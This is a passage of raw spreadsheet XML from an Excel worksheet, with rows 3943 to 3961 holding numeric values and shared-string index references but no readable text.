    </row>
    <row r="3943" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3943" s="12">
        <v>40712</v>
      </c>
      <c r="B3943" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3943" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3943" s="12" t="s">
        <v>31307</v>
      </c>
      <c r="G3943" s="12" t="s">
        <v>25381</v>
      </c>
      <c r="H3943" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3943" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3943" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3943" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3943" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3943" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3943" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3943" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3943" s="12" t="s">
        <v>25382</v>
      </c>
      <c r="Q3943" s="12">
        <v>3</v>
      </c>
      <c r="R3943" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3943" s="12" t="s">
        <v>25383</v>
      </c>
      <c r="T3943" s="12" t="s">
        <v>25384</v>
      </c>
      <c r="U3943" s="12" t="s">
        <v>25385</v>
      </c>
      <c r="V3943" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W3943" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3943" s="12">
        <v>18</v>
      </c>
      <c r="Y3943" s="12" t="s">
        <v>25386</v>
      </c>
    </row>
    <row r="3944" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3944" s="12">
        <v>40952</v>
      </c>
      <c r="B3944" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3944" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3944" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F3944" s="12" t="s">
        <v>31355</v>
      </c>
      <c r="G3944" s="12" t="s">
        <v>25393</v>
      </c>
      <c r="H3944" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3944" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3944" s="12" t="s">
        <v>1656</v>
      </c>
      <c r="K3944" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3944" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3944" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3944" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3944" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3944" s="12" t="s">
        <v>25394</v>
      </c>
      <c r="Q3944" s="12">
        <v>3.1</v>
      </c>
      <c r="R3944" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3944" s="12" t="s">
        <v>25395</v>
      </c>
      <c r="T3944" s="12" t="s">
        <v>461</v>
      </c>
      <c r="U3944" s="12" t="s">
        <v>25396</v>
      </c>
      <c r="V3944" s="12" t="s">
        <v>3602</v>
      </c>
      <c r="W3944" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3944" s="12">
        <v>14</v>
      </c>
      <c r="Y3944" s="12" t="s">
        <v>25397</v>
      </c>
    </row>
    <row r="3945" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3945" s="12">
        <v>41132</v>
      </c>
      <c r="B3945" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D3945" s="12" t="s">
        <v>30900</v>
      </c>
      <c r="E3945" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F3945" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3945" s="12" t="s">
        <v>25403</v>
      </c>
      <c r="H3945" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3945" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J3945" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3945" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3945" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3945" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3945" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3945" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3945" s="12" t="s">
        <v>25010</v>
      </c>
      <c r="Q3945" s="12" t="s">
        <v>28326</v>
      </c>
      <c r="R3945" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3945" s="12" t="s">
        <v>25404</v>
      </c>
      <c r="T3945" s="12" t="s">
        <v>16925</v>
      </c>
      <c r="U3945" s="12" t="s">
        <v>25405</v>
      </c>
      <c r="V3945" s="12" t="s">
        <v>25406</v>
      </c>
      <c r="W3945" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3945" s="12">
        <v>21</v>
      </c>
      <c r="Y3945" s="12" t="s">
        <v>25407</v>
      </c>
    </row>
    <row r="3946" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3946" s="12">
        <v>41152</v>
      </c>
      <c r="B3946" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3946" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3946" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F3946" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3946" s="12" t="s">
        <v>25408</v>
      </c>
      <c r="H3946" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3946" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3946" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3946" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3946" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3946" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3946" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3946" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3946" s="12">
        <v>3</v>
      </c>
      <c r="Q3946" s="12">
        <v>3</v>
      </c>
      <c r="R3946" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3946" s="12" t="s">
        <v>25409</v>
      </c>
      <c r="T3946" s="12" t="s">
        <v>25410</v>
      </c>
      <c r="U3946" s="12" t="s">
        <v>25411</v>
      </c>
      <c r="V3946" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W3946" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3946" s="12">
        <v>10</v>
      </c>
      <c r="Y3946" s="12" t="s">
        <v>25412</v>
      </c>
    </row>
    <row r="3947" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3947" s="12">
        <v>41212</v>
      </c>
      <c r="B3947" s="12" t="s">
        <v>30804</v>
      </c>
      <c r="C3947" s="12" t="s">
        <v>30805</v>
      </c>
      <c r="D3947" s="12" t="s">
        <v>30800</v>
      </c>
      <c r="E3947" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F3947" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3947" s="12" t="s">
        <v>25413</v>
      </c>
      <c r="H3947" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3947" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3947" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3947" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3947" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3947" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3947" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3947" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3947" s="12" t="s">
        <v>25414</v>
      </c>
      <c r="Q3947" s="12">
        <v>3.1</v>
      </c>
      <c r="R3947" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3947" s="12" t="s">
        <v>25415</v>
      </c>
      <c r="T3947" s="12" t="s">
        <v>25416</v>
      </c>
      <c r="U3947" s="12" t="s">
        <v>25417</v>
      </c>
      <c r="V3947" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W3947" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3947" s="12">
        <v>10</v>
      </c>
      <c r="Y3947" s="12" t="s">
        <v>25418</v>
      </c>
    </row>
    <row r="3948" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3948" s="12">
        <v>41342</v>
      </c>
      <c r="B3948" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3948" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3948" s="12" t="s">
        <v>31445</v>
      </c>
      <c r="F3948" s="12" t="s">
        <v>31356</v>
      </c>
      <c r="G3948" s="12" t="s">
        <v>25419</v>
      </c>
      <c r="H3948" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3948" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3948" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K3948" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3948" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3948" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3948" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3948" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3948" s="12" t="s">
        <v>25109</v>
      </c>
      <c r="Q3948" s="12">
        <v>3</v>
      </c>
      <c r="R3948" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3948" s="12" t="s">
        <v>25420</v>
      </c>
      <c r="T3948" s="12" t="s">
        <v>21844</v>
      </c>
      <c r="U3948" s="12" t="s">
        <v>25421</v>
      </c>
      <c r="V3948" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W3948" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3948" s="12">
        <v>7</v>
      </c>
      <c r="Y3948" s="12" t="s">
        <v>25422</v>
      </c>
    </row>
    <row r="3949" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3949" s="12">
        <v>41482</v>
      </c>
      <c r="B3949" s="12" t="s">
        <v>30113</v>
      </c>
      <c r="D3949" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3949" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3949" s="12" t="s">
        <v>25423</v>
      </c>
      <c r="H3949" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3949" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3949" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3949" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3949" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3949" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3949" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3949" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3949" s="12" t="s">
        <v>25424</v>
      </c>
      <c r="Q3949" s="12">
        <v>3</v>
      </c>
      <c r="R3949" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3949" s="12" t="s">
        <v>25425</v>
      </c>
      <c r="T3949" s="12" t="s">
        <v>2622</v>
      </c>
      <c r="U3949" s="12" t="s">
        <v>25426</v>
      </c>
      <c r="V3949" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W3949" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3949" s="12">
        <v>3</v>
      </c>
      <c r="Y3949" s="12" t="s">
        <v>25427</v>
      </c>
    </row>
    <row r="3950" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3950" s="12">
        <v>41502</v>
      </c>
      <c r="B3950" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D3950" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F3950" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3950" s="12" t="s">
        <v>25428</v>
      </c>
      <c r="H3950" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3950" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J3950" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K3950" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3950" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3950" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3950" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3950" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3950" s="12" t="s">
        <v>25399</v>
      </c>
      <c r="Q3950" s="12">
        <v>3.1</v>
      </c>
      <c r="R3950" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3950" s="12" t="s">
        <v>25429</v>
      </c>
      <c r="T3950" s="12" t="s">
        <v>21778</v>
      </c>
      <c r="U3950" s="12" t="s">
        <v>25430</v>
      </c>
      <c r="V3950" s="12" t="s">
        <v>17758</v>
      </c>
      <c r="W3950" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3950" s="12">
        <v>1</v>
      </c>
      <c r="Y3950" s="12" t="s">
        <v>25431</v>
      </c>
    </row>
    <row r="3951" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3951" s="12">
        <v>41672</v>
      </c>
      <c r="B3951" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D3951" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E3951" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F3951" s="12" t="s">
        <v>30466</v>
      </c>
      <c r="G3951" s="12" t="s">
        <v>25437</v>
      </c>
      <c r="H3951" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3951" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J3951" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K3951" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3951" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3951" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3951" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3951" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3951" s="12" t="s">
        <v>25438</v>
      </c>
      <c r="Q3951" s="12">
        <v>3.1</v>
      </c>
      <c r="R3951" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3951" s="12" t="s">
        <v>25439</v>
      </c>
      <c r="T3951" s="12" t="s">
        <v>25440</v>
      </c>
      <c r="U3951" s="12" t="s">
        <v>25441</v>
      </c>
      <c r="V3951" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W3951" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3951" s="12">
        <v>5</v>
      </c>
      <c r="Y3951" s="12" t="s">
        <v>25442</v>
      </c>
    </row>
    <row r="3952" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3952" s="12">
        <v>41742</v>
      </c>
      <c r="B3952" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3952" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3952" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3952" s="12" t="s">
        <v>31357</v>
      </c>
      <c r="G3952" s="12" t="s">
        <v>25443</v>
      </c>
      <c r="H3952" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3952" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3952" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3952" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3952" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3952" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3952" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3952" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3952" s="12" t="s">
        <v>25444</v>
      </c>
      <c r="Q3952" s="12">
        <v>3.1</v>
      </c>
      <c r="R3952" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3952" s="12" t="s">
        <v>25445</v>
      </c>
      <c r="T3952" s="12" t="s">
        <v>10491</v>
      </c>
      <c r="U3952" s="12" t="s">
        <v>25446</v>
      </c>
      <c r="V3952" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W3952" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3952" s="12">
        <v>4</v>
      </c>
      <c r="Y3952" s="12" t="s">
        <v>25447</v>
      </c>
    </row>
    <row r="3953" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3953" s="12">
        <v>41882</v>
      </c>
      <c r="B3953" s="12" t="s">
        <v>30603</v>
      </c>
      <c r="C3953" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D3953" s="12" t="s">
        <v>30602</v>
      </c>
      <c r="E3953" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3953" s="12" t="s">
        <v>30599</v>
      </c>
      <c r="G3953" s="12" t="s">
        <v>25448</v>
      </c>
      <c r="H3953" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3953" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3953" s="12" t="s">
        <v>18372</v>
      </c>
      <c r="K3953" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3953" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3953" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3953" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3953" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="Q3953" s="12" t="s">
        <v>31419</v>
      </c>
      <c r="R3953" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3953" s="12" t="s">
        <v>25449</v>
      </c>
      <c r="T3953" s="12" t="s">
        <v>2339</v>
      </c>
      <c r="U3953" s="12" t="s">
        <v>23735</v>
      </c>
      <c r="V3953" s="12" t="s">
        <v>18373</v>
      </c>
      <c r="W3953" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3953" s="12">
        <v>17</v>
      </c>
      <c r="Y3953" s="12" t="s">
        <v>25450</v>
      </c>
    </row>
    <row r="3954" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3954" s="12">
        <v>42012</v>
      </c>
      <c r="B3954" s="12" t="s">
        <v>30899</v>
      </c>
      <c r="D3954" s="12" t="s">
        <v>30900</v>
      </c>
      <c r="E3954" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F3954" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3954" s="12" t="s">
        <v>25451</v>
      </c>
      <c r="H3954" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3954" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3954" s="12" t="s">
        <v>139</v>
      </c>
      <c r="K3954" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3954" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3954" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3954" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3954" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3954" s="12" t="s">
        <v>25452</v>
      </c>
      <c r="Q3954" s="12" t="s">
        <v>28326</v>
      </c>
      <c r="R3954" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3954" s="12" t="s">
        <v>25453</v>
      </c>
      <c r="T3954" s="12" t="s">
        <v>25454</v>
      </c>
      <c r="U3954" s="12" t="s">
        <v>25455</v>
      </c>
      <c r="V3954" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W3954" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3954" s="12">
        <v>1</v>
      </c>
      <c r="Y3954" s="12" t="s">
        <v>25456</v>
      </c>
    </row>
    <row r="3955" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3955" s="12">
        <v>42122</v>
      </c>
      <c r="B3955" s="13" t="s">
        <v>28390</v>
      </c>
      <c r="C3955" s="13" t="s">
        <v>28391</v>
      </c>
      <c r="D3955" s="13" t="s">
        <v>29838</v>
      </c>
      <c r="E3955" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3955" s="13" t="s">
        <v>28349</v>
      </c>
      <c r="G3955" s="12" t="s">
        <v>25457</v>
      </c>
      <c r="H3955" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3955" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3955" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3955" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3955" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M3955" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N3955" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O3955" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3955" s="12" t="s">
        <v>25458</v>
      </c>
      <c r="Q3955" s="12">
        <v>3.1</v>
      </c>
      <c r="R3955" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3955" s="12" t="s">
        <v>25459</v>
      </c>
      <c r="T3955" s="12" t="s">
        <v>24823</v>
      </c>
      <c r="U3955" s="12" t="s">
        <v>25460</v>
      </c>
      <c r="V3955" s="12" t="s">
        <v>24558</v>
      </c>
      <c r="W3955" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3955" s="12">
        <v>5</v>
      </c>
      <c r="Y3955" s="12" t="s">
        <v>25461</v>
      </c>
    </row>
    <row r="3956" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3956" s="12">
        <v>42142</v>
      </c>
      <c r="B3956" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3956" s="12" t="s">
        <v>30444</v>
      </c>
      <c r="F3956" s="12" t="s">
        <v>30443</v>
      </c>
      <c r="G3956" s="12" t="s">
        <v>25462</v>
      </c>
      <c r="H3956" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3956" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J3956" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K3956" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3956" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M3956" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N3956" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O3956" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3956" s="12" t="s">
        <v>25463</v>
      </c>
      <c r="Q3956" s="12">
        <v>3</v>
      </c>
      <c r="R3956" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3956" s="12" t="s">
        <v>25464</v>
      </c>
      <c r="T3956" s="12" t="s">
        <v>25465</v>
      </c>
      <c r="U3956" s="12" t="s">
        <v>25455</v>
      </c>
      <c r="V3956" s="12" t="s">
        <v>8781</v>
      </c>
      <c r="W3956" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3956" s="12">
        <v>1</v>
      </c>
      <c r="Y3956" s="12" t="s">
        <v>25466</v>
      </c>
    </row>
    <row r="3957" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3957" s="12">
        <v>42162</v>
      </c>
      <c r="B3957" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3957" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3957" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3957" s="12" t="s">
        <v>31357</v>
      </c>
      <c r="G3957" s="12" t="s">
        <v>25467</v>
      </c>
      <c r="H3957" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3957" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3957" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K3957" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3957" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3957" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3957" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3957" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3957" s="12" t="s">
        <v>25468</v>
      </c>
      <c r="Q3957" s="12">
        <v>3.1</v>
      </c>
      <c r="R3957" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3957" s="12" t="s">
        <v>25469</v>
      </c>
      <c r="T3957" s="12" t="s">
        <v>25470</v>
      </c>
      <c r="U3957" s="12" t="s">
        <v>25455</v>
      </c>
      <c r="V3957" s="12" t="s">
        <v>15191</v>
      </c>
      <c r="W3957" s="12">
        <v>42172</v>
      </c>
      <c r="X3957" s="12">
        <v>15</v>
      </c>
      <c r="Y3957" s="12" t="s">
        <v>25471</v>
      </c>
    </row>
    <row r="3958" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3958" s="12">
        <v>42232</v>
      </c>
      <c r="B3958" s="12" t="s">
        <v>31338</v>
      </c>
      <c r="D3958" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="F3958" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G3958" s="12" t="s">
        <v>25472</v>
      </c>
      <c r="H3958" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3958" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J3958" s="12" t="s">
        <v>9315</v>
      </c>
      <c r="K3958" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3958" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3958" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3958" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3958" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3958" s="12" t="s">
        <v>25473</v>
      </c>
      <c r="Q3958" s="12">
        <v>3</v>
      </c>
      <c r="R3958" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3958" s="12" t="s">
        <v>25474</v>
      </c>
      <c r="T3958" s="12" t="s">
        <v>12566</v>
      </c>
      <c r="U3958" s="12" t="s">
        <v>25475</v>
      </c>
      <c r="V3958" s="12" t="s">
        <v>10241</v>
      </c>
      <c r="W3958" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3958" s="12">
        <v>3</v>
      </c>
      <c r="Y3958" s="12" t="s">
        <v>25476</v>
      </c>
    </row>
    <row r="3959" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3959" s="12">
        <v>42262</v>
      </c>
      <c r="B3959" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3959" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3959" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F3959" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G3959" s="12" t="s">
        <v>25477</v>
      </c>
      <c r="H3959" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3959" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J3959" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K3959" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3959" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3959" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3959" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3959" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3959" s="12" t="s">
        <v>25478</v>
      </c>
      <c r="Q3959" s="12">
        <v>3.1</v>
      </c>
      <c r="R3959" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3959" s="12" t="s">
        <v>25479</v>
      </c>
      <c r="T3959" s="12" t="s">
        <v>2494</v>
      </c>
      <c r="U3959" s="12" t="s">
        <v>25480</v>
      </c>
      <c r="V3959" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W3959" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3959" s="12">
        <v>3</v>
      </c>
      <c r="Y3959" s="12" t="s">
        <v>25481</v>
      </c>
    </row>
    <row r="3960" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3960" s="12">
        <v>42563</v>
      </c>
      <c r="B3960" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3960" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E3960" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F3960" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3960" s="12" t="s">
        <v>25482</v>
      </c>
      <c r="H3960" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I3960" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J3960" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K3960" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L3960" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M3960" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N3960" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O3960" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P3960" s="12" t="s">
        <v>25483</v>
      </c>
      <c r="Q3960" s="12">
        <v>3.2</v>
      </c>
      <c r="R3960" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S3960" s="12" t="s">
        <v>25484</v>
      </c>
      <c r="T3960" s="12" t="s">
        <v>25485</v>
      </c>
      <c r="U3960" s="12" t="s">
        <v>25486</v>
      </c>
      <c r="V3960" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W3960" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X3960" s="12">
        <v>9</v>
      </c>
      <c r="Y3960" s="12" t="s">
        <v>25487</v>
      </c>
    </row>
    <row r="3961" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A3961" s="12">
        <v>42578</v>
      </c>
      <c r="B3961" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D3961" s="12" t="s">
        <v>30283</v>
      </c>
      <c r="E3961" s="12" t="s">
        <v>31469</v>
      </c>
      <c r="F3961" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G3961" s="12" t="s">
        <v>25489</v>
      </c>
      <c r="H3961" s="12" t="s">
        <v>21</v>
